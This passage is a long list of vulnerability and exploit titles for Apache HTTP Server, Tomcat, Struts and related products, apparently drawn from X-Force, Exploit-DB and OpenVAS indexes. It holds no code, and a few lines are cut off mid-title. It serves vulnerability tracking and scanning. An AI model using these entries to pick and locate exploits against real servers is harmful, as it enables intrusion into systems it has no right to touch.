10753| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
10754| [11195] Apache Tomcat web.xml could be used to read files
10755| [11194] Apache Tomcat URL appended with a null character could list directories
10756| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
10757| [11126] Apache HTTP Server illegal character file disclosure
10758| [11125] Apache HTTP Server DOS device name HTTP POST code execution
10759| [11124] Apache HTTP Server DOS device name denial of service
10760| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
10761| [10938] Apache HTTP Server printenv test CGI cross-site scripting
10762| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
10763| [10575] Apache mod_php module could allow an attacker to take over the httpd process
10764| [10499] Apache HTTP Server WebDAV HTTP POST view source
10765| [10457] Apache HTTP Server mod_ssl "
10766| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
10767| [10414] Apache HTTP Server htdigest multiple buffer overflows
10768| [10413] Apache HTTP Server htdigest temporary file race condition
10769| [10412] Apache HTTP Server htpasswd temporary file race condition
10770| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
10771| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
10772| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
10773| [10280] Apache HTTP Server shared memory scorecard overwrite
10774| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
10775| [10241] Apache HTTP Server Host: header cross-site scripting
10776| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
10777| [10208] Apache HTTP Server mod_dav denial of service
10778| [10206] HP VVOS Apache mod_ssl denial of service
10779| [10200] Apache HTTP Server stderr denial of service
10780| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
10781| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
10782| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
10783| [10098] Slapper worm targets OpenSSL/Apache systems
10784| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
10785| [9875] Apache HTTP Server .var file request could disclose installation path
10786| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
10787| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
10788| [9623] Apache HTTP Server ap_log_rerror() path disclosure
10789| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
10790| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
10791| [9396] Apache Tomcat null character to threads denial of service
10792| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
10793| [9249] Apache HTTP Server chunked encoding heap buffer overflow
10794| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
10795| [8932] Apache Tomcat example class information disclosure
10796| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
10797| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
10798| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
10799| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
10800| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
10801| [8400] Apache HTTP Server mod_frontpage buffer overflows
10802| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
10803| [8308] Apache "
10804| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
10805| [8119] Apache and PHP OPTIONS request reveals "
10806| [8054] Apache is running on the system
10807| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
10808| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
10809| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
10810| [7836] Apache HTTP Server log directory denial of service
10811| [7815] Apache for Windows "
10812| [7810] Apache HTTP request could result in unexpected behavior
10813| [7599] Apache Tomcat reveals installation path
10814| [7494] Apache "
10815| [7419] Apache Web Server could allow remote attackers to overwrite .log files
10816| [7363] Apache Web Server hidden HTTP requests
10817| [7249] Apache mod_proxy denial of service
10818| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
10819| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
10820| [7059] Apache "
10821| [7057] Apache "
10822| [7056] Apache "
10823| [7055] Apache "
10824| [7054] Apache "
10825| [6997] Apache Jakarta Tomcat error message may reveal information
10826| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
10827| [6970] Apache crafted HTTP request could reveal the internal IP address
10828| [6921] Apache long slash path allows directory listing
10829| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
10830| [6527] Apache Web Server for Windows and OS2 denial of service
10831| [6316] Apache Jakarta Tomcat may reveal JSP source code
10832| [6305] Apache Jakarta Tomcat directory traversal
10833| [5926] Linux Apache symbolic link
10834| [5659] Apache Web server discloses files when used with php script
10835| [5310] Apache mod_rewrite allows attacker to view arbitrary files
10836| [5204] Apache WebDAV directory listings
10837| [5197] Apache Web server reveals CGI script source code
10838| [5160] Apache Jakarta Tomcat default installation
10839| [5099] Trustix Secure Linux installs Apache with world writable access
10840| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
10841| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
10842| [4931] Apache source.asp example file allows users to write to files
10843| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
10844| [4205] Apache Jakarta Tomcat delivers file contents
10845| [2084] Apache on Debian by default serves the /usr/doc directory
10846| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
10847| [697] Apache HTTP server beck exploit
10848| [331] Apache cookies buffer overflow
10849|
10850| Exploit-DB - https://www.exploit-db.com:
10851| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
10852| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
10853| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
10854| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
10855| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
10856| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
10857| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
10858| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
10859| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
10860| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
10861| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
10862| [29859] Apache Roller OGNL Injection
10863| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
10864| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
10865| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
10866| [29290] Apache / PHP 5.x Remote Code Execution Exploit
10867| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
10868| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
10869| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
10870| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
10871| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
10872| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
10873| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
10874| [27096] Apache Geronimo 1.0 Error Page XSS
10875| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
10876| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
10877| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
10878| [25986] Plesk Apache Zeroday Remote Exploit
10879| [25980] Apache Struts includeParams Remote Code Execution
10880| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
10881| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
10882| [24874] Apache Struts ParametersInterceptor Remote Code Execution
10883| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
10884| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
10885| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
10886| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
10887| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
10888| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
10889| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
10890| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
10891| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
10892| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
10893| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
10894| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
10895| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
10896| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
10897| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
10898| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
10899| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
10900| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
10901| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
10902| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
10903| [21719] Apache 2.0 Path Disclosure Vulnerability
10904| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
10905| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
10906| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
10907| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
10908| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
10909| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
10910| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
10911| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
10912| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
10913| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
10914| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
10915| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
10916| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
10917| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
10918| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
10919| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
10920| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
10921| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
10922| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
10923| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
10924| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
10925| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
10926| [20558] Apache 1.2 Web Server DoS Vulnerability
10927| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
10928| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
10929| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
10930| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
10931| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
10932| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
10933| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
10934| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
10935| [19231] PHP apache_request_headers Function Buffer Overflow
10936| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
10937| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
10938| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
10939| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
10940| [18442] Apache httpOnly Cookie Disclosure
10941| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
10942| [18221] Apache HTTP Server Denial of Service
10943| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
10944| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
10945| [17691] Apache Struts < 2.2.0 - Remote Command Execution
10946| [16798] Apache mod_jk 1.2.20 Buffer Overflow
10947| [16782] Apache Win32 Chunked Encoding
10948| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
10949| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
10950| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
10951| [15319] Apache 2.2 (Windows) Local Denial of Service
10952| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
10953| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
10954| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
10955| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
10956| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
10957| [12330] Apache OFBiz - Multiple XSS
10958| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
10959| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
10960| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
10961| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
10962| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
10963| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
10964| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
10965| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
10966| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
10967| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
10968| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
10969| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
10970| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
10971| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
10972| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
10973| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
10974| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
10975| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
10976| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
10977| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
10978| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
10979| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
10980| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
10981| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
10982| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
10983| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
10984| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
10985| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
10986| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
10987| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
10988| [466] htpasswd Apache 1.3.31 - Local Exploit
10989| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
10990| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
10991| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
10992| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
10993| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
10994| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
10995| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
10996| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
10997| [9] Apache HTTP Server 2.x Memory Leak Exploit
10998|
10999| OpenVAS (Nessus) - http://www.openvas.org:
11000| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
11001| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
11002| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
11003| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
11004| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
11005| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
11006| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
11007| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
11008| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
11009| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
11010| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
11011| [900571] Apache APR-Utils Version Detection
11012| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
11013| [900496] Apache Tiles Multiple XSS Vulnerability
11014| [900493] Apache Tiles Version Detection
11015| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
11016| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
11017| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
11018| [870175] RedHat Update for apache RHSA-2008:0004-01
11019| [864591] Fedora Update for apache-poi FEDORA-2012-10835
11020| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
11021| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
11022| [864250] Fedora Update for apache-poi FEDORA-2012-7683
11023| [864249] Fedora Update for apache-poi FEDORA-2012-7686
11024| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
11025| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
11026| [855821] Solaris Update for Apache 1.3 122912-19
11027| [855812] Solaris Update for Apache 1.3 122911-19
11028| [855737] Solaris Update for Apache 1.3 122911-17
11029| [855731] Solaris Update for Apache 1.3 122912-17
11030| [855695] Solaris Update for Apache 1.3 122911-16
11031| [855645] Solaris Update for Apache 1.3 122912-16
11032| [855587] Solaris Update for kernel update and Apache 108529-29
11033| [855566] Solaris Update for Apache 116973-07
11034| [855531] Solaris Update for Apache 116974-07
11035| [855524] Solaris Update for Apache 2 120544-14
11036| [855494] Solaris Update for Apache 1.3 122911-15
11037| [855478] Solaris Update for Apache Security 114145-11
11038| [855472] Solaris Update for Apache Security 113146-12
11039| [855179] Solaris Update for Apache 1.3 122912-15
11040| [855147] Solaris Update for kernel update and Apache 108528-29
11041| [855077] Solaris Update for Apache 2 120543-14
11042| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
11043| [850088] SuSE Update for apache2 SUSE-SA:2007:061
11044| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
11045| [841209] Ubuntu Update for apache2 USN-1627-1
11046| [840900] Ubuntu Update for apache2 USN-1368-1
11047| [840798] Ubuntu Update for apache2 USN-1259-1
11048| [840734] Ubuntu Update for apache2 USN-1199-1
11049| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
11050| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
11051| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
11052| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
11053| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
11054| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
11055| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
11056| [835253] HP-UX Update for Apache Web Server HPSBUX02645
11057| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
11058| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
11059| [835236] HP-UX Update for Apache with PHP HPSBUX02543
11060| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
11061| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
11062| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
11063| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
11064| [835188] HP-UX Update for Apache HPSBUX02308
11065| [835181] HP-UX Update for Apache With PHP HPSBUX02332
11066| [835180] HP-UX Update for Apache with PHP HPSBUX02342
11067| [835172] HP-UX Update for Apache HPSBUX02365
11068| [835168] HP-UX Update for Apache HPSBUX02313
11069| [835148] HP-UX Update for Apache HPSBUX01064
11070| [835139] HP-UX Update for Apache with PHP HPSBUX01090
11071| [835131] HP-UX Update for Apache HPSBUX00256
11072| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
11073| [835104] HP-UX Update for Apache HPSBUX00224
11074| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
11075| [835101] HP-UX Update for Apache HPSBUX01232
11076| [835080] HP-UX Update for Apache HPSBUX02273
11077| [835078] HP-UX Update for ApacheStrong HPSBUX00255
11078| [835044] HP-UX Update for Apache HPSBUX01019
11079| [835040] HP-UX Update for Apache PHP HPSBUX00207
11080| [835025] HP-UX Update for Apache HPSBUX00197
11081| [835023] HP-UX Update for Apache HPSBUX01022
11082| [835022] HP-UX Update for Apache HPSBUX02292
11083| [835005] HP-UX Update for Apache HPSBUX02262
11084| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
11085| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
11086| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
11087| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
11088| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
11089| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
11090| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
11091| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
11092| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
11093| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
11094| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
11095| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
11096| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
11097| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
11098| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
11099| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
11100| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
11101| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
11102| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
11103| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
11104| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
11105| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
11106| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
11107| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
11108| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
11109| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
11110| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
11111| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
11112| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
11113| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
11114| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
11115| [801942] Apache Archiva Multiple Vulnerabilities
11116| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
11117| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
11118| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
11119| [801284] Apache Derby Information Disclosure Vulnerability
11120| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
11121| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
11122| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
11123| [800680] Apache APR Version Detection
11124| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
11125| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
11126| [800677] Apache Roller Version Detection
11127| [800279] Apache mod_jk Module Version Detection
11128| [800278] Apache Struts Cross Site Scripting Vulnerability
11129| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
11130| [800276] Apache Struts Version Detection
11131| [800271] Apache Struts Directory Traversal Vulnerability
11132| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
11133| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
11134| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
11135| [103122] Apache Web Server ETag Header Information Disclosure Weakness
11136| [103074] Apache Continuum Cross Site Scripting Vulnerability
11137| [103073] Apache Continuum Detection
11138| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
11139| [101023] Apache Open For Business Weak Password security check
11140| [101020] Apache Open For Business HTML injection vulnerability
11141| [101019] Apache Open For Business service detection
11142| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
11143| [100923] Apache Archiva Detection
11144| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
11145| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
11146| [100813] Apache Axis2 Detection
11147| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
11148| [100795] Apache Derby Detection
11149| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
11150| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
11151| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
11152| [100514] Apache Multiple Security Vulnerabilities
11153| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
11154| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
11155| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
11156| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
11157| [72626] Debian Security Advisory DSA 2579-1 (apache2)
11158| [72612] FreeBSD Ports: apache22
11159| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
11160| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
11161| [71512] FreeBSD Ports: apache
11162| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
11163| [71256] Debian Security Advisory DSA 2452-1 (apache2)
11164| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
11165| [70737] FreeBSD Ports: apache
11166| [70724] Debian Security Advisory DSA 2405-1 (apache2)
11167| [70600] FreeBSD Ports: apache
11168| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
11169| [70235] Debian Security Advisory DSA 2298-2 (apache2)
11170| [70233] Debian Security Advisory DSA 2298-1 (apache2)
11171| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
11172| [69338] Debian Security Advisory DSA 2202-1 (apache2)
11173| [67868] FreeBSD Ports: apache
11174| [66816] FreeBSD Ports: apache
11175| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
11176| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
11177| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
11178| [66081] SLES11: Security update for Apache 2
11179| [66074] SLES10: Security update for Apache 2
11180| [66070] SLES9: Security update for Apache 2
11181| [65998] SLES10: Security update for apache2-mod_python
11182| [65893] SLES10: Security update for Apache 2
11183| [65888] SLES10: Security update for Apache 2
11184| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
11185| [65510] SLES9: Security update for Apache 2
11186| [65472] SLES9: Security update for Apache
11187| [65467] SLES9: Security update for Apache
11188| [65450] SLES9: Security update for apache2
11189| [65390] SLES9: Security update for Apache2
11190| [65363] SLES9: Security update for Apache2
11191| [65309] SLES9: Security update for Apache and mod_ssl
11192| [65296] SLES9: Security update for webdav apache module
11193| [65283] SLES9: Security update for Apache2
